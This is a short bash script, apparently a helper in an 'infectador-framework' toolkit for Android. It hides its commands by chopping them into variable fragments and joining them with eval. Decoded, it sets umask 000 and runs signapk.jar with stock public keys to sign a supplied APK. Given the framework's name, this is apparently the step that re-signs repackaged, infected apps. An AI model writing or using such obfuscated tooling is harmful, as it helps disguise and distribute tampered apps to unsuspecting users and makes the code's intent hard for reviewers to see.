#!/bin/bash
z="
";Kz='k 00';iz='ador';Lz='0';Dz='BRAR';vz='work';Bz='rt L';oz='.x50';sz='ctad';Nz='PREF';Vz='24m ';cz='ork/';wz='/pub';Yz='nfec';Gz='$LIB';Uz='mx10';dz='sign';Zz='tado';Oz='IX/b';rz='infe';bz='amew';mz='ubli';az='r-fr';Xz=' ~/i';Pz='in';xz='lick';Jz='umas';gz='~/in';BBz='$@"';Iz='"';Az='expo';ABz='k8 "';yz='ey.p';lz='rk/p';jz='-fra';ez='apk.';Fz='TH="';pz='9.pe';nz='ckey';Sz='/jav';Wz='-jar';Tz='a -X';kz='mewo';fz='jar ';Mz='cd $';Ez='Y_PA';hz='fect';uz='rame';Qz='/usr';Hz='_DIR';Rz='/bin';qz='m ~/';tz='or-f';Cz='D_LI';
eval "$Az$Bz$Cz$Dz$Ez$Fz$Gz$Hz$Iz$z$Jz$Kz$Lz$z$Mz$Nz$Oz$Pz$z$Qz$Rz$Sz$Tz$Uz$Vz$Wz$Xz$Yz$Zz$az$bz$cz$dz$ez$fz$gz$hz$iz$jz$kz$lz$mz$nz$oz$pz$qz$rz$sz$tz$uz$vz$wz$xz$yz$ABz$BBz"
